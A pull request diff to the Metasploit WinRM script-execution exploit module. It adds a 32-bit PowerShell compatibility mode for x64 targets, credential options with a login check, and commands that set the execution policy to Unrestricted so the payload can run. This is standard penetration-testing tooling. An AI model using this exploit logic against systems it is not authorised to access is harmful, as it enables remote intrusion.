### PR TITLE
Add 32bit comapt mode for 64 bit targets on wirnm

### DIFF
--- a/modules/exploits/windows/winrm/winrm_script_exec.rb
+++ b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -83,7 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 		if powershell2?
-			return unless correct_payload_arch?
 			path = upload_script
 			return if path.nil?
 			exec_script(path)
@@ -127,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exec_script(path)
 		print_status "Attempting to execute script..."
-		cmd = "powershell -File #{path}"
+		cmd = "#{@invoke_powershell} -File #{path}"
 		winrm_run_cmd_hanging(cmd)
 	end
 
@@ -135,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		script = script.chars.to_a.join("\x00").chomp
 		script << "\x00" unless script[-1].eql? "\x00"
 		script = Rex::Text.encode_base64(script).chomp
-		cmd = "powershell -encodedCommand #{script}"
+		cmd = "#{@invoke_powershell} -encodedCommand #{script}"
 	end
 
 	def temp_dir
@@ -173,11 +172,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def correct_payload_arch?
-		target_arch = check_remote_arch
-		case target_arch
+		@target_arch = check_remote_arch
+		case @target_arch
 		when "x64"
 			unless datastore['PAYLOAD'].include? "x64"
-				print_error "You selected an x86 payload for an x64 target!"
+				print_error "You selected an x86 payload for an x64 target...trying to run in compat mode"
 				return false
 			end
 		when "x86"
@@ -218,8 +217,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 		end
 
+		return false unless correct_payload_arch? or @target_arch == "x64"
+		if @target_arch == "x64"
+			@invoke_powershell = "%SYSTEMROOT%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
+		else
+			@invoke_powershell = "powershell"
+		end
+
 		print_status "Attempting to set Execution Policy"
-		streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
+		streams = winrm_run_cmd("#{@invoke_powershell} Set-ExecutionPolicy Unrestricted")
 		if streams == 401
 			print_error "Login failed!"
 			return false
@@ -228,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_error "Recieved error while running check"
 			return false
 		end
-		streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
+		streams = winrm_run_cmd("#{@invoke_powershell} Get-ExecutionPolicy")
 		if streams['stdout'].include? 'Unrestricted'
 			print_good "Set Execution Policy Successfully"
 			return true

--- a/modules/exploits/windows/winrm/winrm_script_exec.rb
+++ b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -56,7 +56,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options(
 			[
-				OptBool.new('FORCE_VBS', [ true, 'Force the module to use the VBS CmdStager', false])
+				OptBool.new('FORCE_VBS', [ true, 'Force the module to use the VBS CmdStager', false]),
+				OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),
+				OptString.new('PASSWORD', [ true, 'A specific password to authenticate with' ]),
 			], self.class
 		)
 
@@ -80,6 +82,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		unless  check == Msf::Exploit::CheckCode::Vulnerable
+			return
+		end
+		unless valid_login?
+			print_error "Login Failure. Recheck your credentials"
 			return
 		end
 		if powershell2?
@@ -241,6 +247,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			return true
 		end
 		return false
+	end
+
+	def valid_login?
+		data = winrm_wql_msg("Select Name,Status from Win32_Service")
+		resp,c = send_request_ntlm(data)
+		unless resp.code == 200
+			return false
+		end
+		return true
 	end
 
 end

--- a/modules/exploits/windows/winrm/winrm_script_exec.rb
+++ b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
 				File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")]),
 		], self.class)
-
+		@compat_mode = false
 	end
 
 	def check
@@ -177,6 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		when "x64"
 			unless datastore['PAYLOAD'].include? "x64"
 				print_error "You selected an x86 payload for an x64 target...trying to run in compat mode"
+				@compat_mode = true
 				return false
 			end
 		when "x86"
@@ -218,7 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		return false unless correct_payload_arch? or @target_arch == "x64"
-		if @target_arch == "x64"
+		if @compat_mode == true
 			@invoke_powershell = "%SYSTEMROOT%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
 		else
 			@invoke_powershell = "powershell"


### PR DESCRIPTION
When a 32 bit payload is selected for an x64 target using the powershell
2.0 method,
it will try to invoke the 32bit version of pwoershell to sue instead
allowing us to still get a session even with the wrong payload arch
